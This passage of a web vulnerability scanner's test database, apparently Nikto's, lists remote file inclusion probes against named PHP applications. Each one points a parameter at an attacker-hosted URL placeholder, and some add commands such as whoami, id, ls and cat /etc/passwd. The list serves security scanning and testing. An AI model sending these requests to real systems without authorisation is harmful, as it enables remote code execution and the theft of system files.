list.","","" "004661","https://gist.github.com/mubix/5d269c686584875015a2","c","/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004662","https://gist.github.com/mubix/5d269c686584875015a2","c","/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004663","https://gist.github.com/mubix/5d269c686584875015a2","c","/downstat1.8/chart.php?art=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004664","https://gist.github.com/mubix/5d269c686584875015a2","c","/dp_logs.php?HomeDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004665","https://gist.github.com/mubix/5d269c686584875015a2","c","/eXPerience2/modules.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004666","https://gist.github.com/mubix/5d269c686584875015a2","c","/ea-gBook/index_inc.php?inc_ordner=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004667","https://gist.github.com/mubix/5d269c686584875015a2","c","/edit.php?javascript_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004668","https://gist.github.com/mubix/5d269c686584875015a2","c","/editor.php?newsfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004669","https://gist.github.com/mubix/5d269c686584875015a2","c","/editprofile.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004670","https://gist.github.com/mubix/5d269c686584875015a2","c","/editsite.php?returnpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004671","https://gist.github.com/mubix/5d269c686584875015a2","c","/editx/add_address.php?include_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004672","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/contenus.php?contenus=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004673","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004674","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004675","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004676","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004677","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/moduleajouter/depot/usrdepot.php?corpsdesign@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004678","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004679","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004680","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004681","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004682","https://gist.github.com/mubix/5d269c686584875015a2","c","/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004683","https://gist.github.com/mubix/5d269c686584875015a2","c","/email_subscribe.php?root_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004684","https://gist.github.com/mubix/5d269c686584875015a2","c","/email_subscribe.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004685","https://gist.github.com/mubix/5d269c686584875015a2","c","/embed/day.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004686","https://gist.github.com/mubix/5d269c686584875015a2","c","/enc/content.php?Home_Path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004687","https://gist.github.com/mubix/5d269c686584875015a2","c","/engine/Ajax/editnews.php?root_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004688","https://gist.github.com/mubix/5d269c686584875015a2","c","/engine/api/api.class.php?dle_config_api=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004689","https://gist.github.com/mubix/5d269c686584875015a2","c","/engine/engine.inc.php?absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004690","https://gist.github.com/mubix/5d269c686584875015a2","c","/engine/init.php?root_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004691","https://gist.github.com/mubix/5d269c686584875015a2","c","/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004692","https://gist.github.com/mubix/5d269c686584875015a2","c","/enth3/show_joined.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004693","https://gist.github.com/mubix/5d269c686584875015a2","c","/environment.php?DIR_PREFIX=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004694","https://gist.github.com/mubix/5d269c686584875015a2","c","/epal/index.php?view=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004695","https://gist.github.com/mubix/5d269c686584875015a2","c","/errors.php?error=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004696","https://gist.github.com/mubix/5d269c686584875015a2","c","/errors/configmode.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004698","https://gist.github.com/mubix/5d269c686584875015a2","c","/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004699","https://gist.github.com/mubix/5d269c686584875015a2","c","/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004700","https://gist.github.com/mubix/5d269c686584875015a2","c","/es_custom_menu.php?files_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004701","https://gist.github.com/mubix/5d269c686584875015a2","c","/es_desp.php?files_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004702","https://gist.github.com/mubix/5d269c686584875015a2","c","/es_offer.php?files_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004703","https://gist.github.com/mubix/5d269c686584875015a2","c","/eshow.php?Config_rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004704","https://gist.github.com/mubix/5d269c686584875015a2","c","/esupport/admin/autoclose.php?subd=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004705","https://gist.github.com/mubix/5d269c686584875015a2","c","/eva/index.php3?aide=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004706","https://gist.github.com/mubix/5d269c686584875015a2","c","/eva/index.php3?aide=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004707","https://gist.github.com/mubix/5d269c686584875015a2","c","/eva/index.php3?perso=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004708","https://gist.github.com/mubix/5d269c686584875015a2","c","/eva/index.php?eva[caminho]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004709","https://gist.github.com/mubix/5d269c686584875015a2","c","/event.php?myevent_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004710","https://gist.github.com/mubix/5d269c686584875015a2","c","/event_cal/module/embed/day.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004711","https://gist.github.com/mubix/5d269c686584875015a2","c","/eventcal2.php.php?path_simpnews=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004712","https://gist.github.com/mubix/5d269c686584875015a2","c","/eventscroller.php?path_simpnews=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004713","https://gist.github.com/mubix/5d269c686584875015a2","c","/example-view/templates/article.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004714","https://gist.github.com/mubix/5d269c686584875015a2","c","/example-view/templates/dates_list.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004715","https://gist.github.com/mubix/5d269c686584875015a2","c","/example-view/templates/root.php?globals[content_dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004716","https://gist.github.com/mubix/5d269c686584875015a2","c","/example.php?site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004717","https://gist.github.com/mubix/5d269c686584875015a2","c","/example/gamedemo/inc.functions.php?projectPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004718","https://gist.github.com/mubix/5d269c686584875015a2","c","/examplefile.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004719","https://gist.github.com/mubix/5d269c686584875015a2","c","/examples/patExampleGen/bbcodeSource.php?example=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004720","https://gist.github.com/mubix/5d269c686584875015a2","c","/exception/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004721","https://gist.github.com/mubix/5d269c686584875015a2","c","/extauth/drivers/ldap.inc.php?clarolineRepositorySys=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004722","https://gist.github.com/mubix/5d269c686584875015a2","c","/extras/mt.php?web_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004723","https://gist.github.com/mubix/5d269c686584875015a2","c","/extras/poll/poll.php?file_newsportal=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004724","https://gist.github.com/mubix/5d269c686584875015a2","c","/ezusermanager_pwd_forgott.php?ezUserManager_Path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004725","https://gist.github.com/mubix/5d269c686584875015a2","c","/faq.php?module_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004726","https://gist.github.com/mubix/5d269c686584875015a2","c","/faq.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004727","https://gist.github.com/mubix/5d269c686584875015a2","c","@FCKEDITOReditor/dialog/fck_link.php?dirroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004728","https://gist.github.com/mubix/5d269c686584875015a2","c","@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?Dirroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004729","https://gist.github.com/mubix/5d269c686584875015a2","c","@FCKEDITOReditor/filemanager/browser/default/connectors/php/connector.php?dirroot=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004730","https://gist.github.com/mubix/5d269c686584875015a2","c","/fcring.php?s_fuss=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004731","https://gist.github.com/mubix/5d269c686584875015a2","c","/feed.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004732","https://gist.github.com/mubix/5d269c686584875015a2","c","/feed/index2.php?m=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004733","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/amazon-bestsellers.php?CarpPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004734","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/carprss.php?CarpPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004735","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/compose-attach.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004736","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/compose-menu.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004737","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/compose-new.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004738","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/compose-send.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004739","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/folder-create.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004740","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/folder-delete.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004741","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/folder-empty.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004742","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/folder-rename.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004743","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/folders.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004744","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/login.php3?err=hack&BSX_HTXDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004745","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/mainfile.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004746","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/mbox-list.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004747","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-delete.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004748","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-forward.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004749","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-header.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004750","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-print.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004751","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-read.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004752","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-reply.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004753","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-replyall.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004754","https://gist.github.com/mubix/5d269c686584875015a2","c","/files/message-search.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004755","https://gist.github.com/mubix/5d269c686584875015a2","c","/findix/index.php?page=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004756","https://gist.github.com/mubix/5d269c686584875015a2","c","/fishcart_v3/fc_functions/fc_example.php?docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004757","https://gist.github.com/mubix/5d269c686584875015a2","c","/flushcmd/Include/editor/rich_files/class.rich.php?class_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004758","https://gist.github.com/mubix/5d269c686584875015a2","c","/fonctions/template.php?repphp=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004759","https://gist.github.com/mubix/5d269c686584875015a2","c","/fonctions_racine.php?chemin_lib=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004760","https://gist.github.com/mubix/5d269c686584875015a2","c","/footer.inc.php?settings[footer]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004761","https://gist.github.com/mubix/5d269c686584875015a2","c","/footer.inc.php?tfooter=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004762","https://gist.github.com/mubix/5d269c686584875015a2","c","/footer.inc.php?tfooter=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004763","https://gist.github.com/mubix/5d269c686584875015a2","c","/footer.php?footer_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004764","https://gist.github.com/mubix/5d269c686584875015a2","c","/footer.php?op[footer_body]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004765","https://gist.github.com/mubix/5d269c686584875015a2","c","/form.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004766","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum.php?cfg_file=1&fpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004767","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/forum.php?view=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004768","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/forum82lib.php3?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004769","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/gesfil.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004770","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/lostpassword.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004771","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/mail.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004772","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/member.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004773","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/message.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004774","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/search.php?repertorylevel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004775","https://gist.github.com/mubix/5d269c686584875015a2","c","/forum/track.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004776","https://gist.github.com/mubix/5d269c686584875015a2","c","/frame.php?framefile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004777","https://gist.github.com/mubix/5d269c686584875015a2","c","/ftp.php?path_local=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004778","https://gist.github.com/mubix/5d269c686584875015a2","c","/function.inc.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004779","https://gist.github.com/mubix/5d269c686584875015a2","c","/function.php?adminfolder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004780","https://gist.github.com/mubix/5d269c686584875015a2","c","/function.php?gbpfad=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004781","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions.php?include_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004782","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions.php?pmp_rel_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004783","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions.php?s[phppath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004784","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions.php?set_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004785","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/form.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004786","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/general.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004787","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/groups.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004788","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/js.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004789","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/prepend_adm.php?SETS[path][physical]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004790","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/prepend_adm.php?SETS[path][physical]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004791","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/sections.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004792","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions/users.func.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004793","https://gist.github.com/mubix/5d269c686584875015a2","c","/functions_mod_user.php?phpbb_root_path=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004794","https://gist.github.com/mubix/5d269c686584875015a2","c","/fusebox5.php?FUSEBOX_APPLICATION_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004795","https://gist.github.com/mubix/5d269c686584875015a2","c","/galerie.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004797","https://gist.github.com/mubix/5d269c686584875015a2","c","/gallery/lib/content.php?include=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004798","https://gist.github.com/mubix/5d269c686584875015a2","c","/gallery/theme/include_mode/template.php?galleryfilesdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004799","https://gist.github.com/mubix/5d269c686584875015a2","c","/gallerypath/index.php?includepath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004800","https://gist.github.com/mubix/5d269c686584875015a2","c","/games.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004801","https://gist.github.com/mubix/5d269c686584875015a2","c","/games.php?scoreid=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004802","https://gist.github.com/mubix/5d269c686584875015a2","c","/gbook/includes/header.php?abspath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004803","https://gist.github.com/mubix/5d269c686584875015a2","c","/gemini/page/forums/bottom.php?lang=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004804","https://gist.github.com/mubix/5d269c686584875015a2","c","/gen_m3u.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004805","https://gist.github.com/mubix/5d269c686584875015a2","c","/genepi.php?topdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004806","https://gist.github.com/mubix/5d269c686584875015a2","c","/generate.php?ht_pfad=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004807","https://gist.github.com/mubix/5d269c686584875015a2","c","/gepi/gestion/savebackup.php?filename=@RFIURL&cmd=cat/etc/passwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004808","https://gist.github.com/mubix/5d269c686584875015a2","c","/gestArt/aide.php3?aide=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004809","https://gist.github.com/mubix/5d269c686584875015a2","c","/get_session_vars.php?path_to_smf=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004810","https://gist.github.com/mubix/5d269c686584875015a2","c","/getpage.php?page=online&doc_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004811","https://gist.github.com/mubix/5d269c686584875015a2","c","/global.php?abs_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004812","https://gist.github.com/mubix/5d269c686584875015a2","c","/gorum/dbproperty.php?appDirName=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004813","https://gist.github.com/mubix/5d269c686584875015a2","c","/gpb/include/db.mysql.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004814","https://gist.github.com/mubix/5d269c686584875015a2","c","/gpb/include/db.mysql.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004815","https://gist.github.com/mubix/5d269c686584875015a2","c","/gpb/include/gpb.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 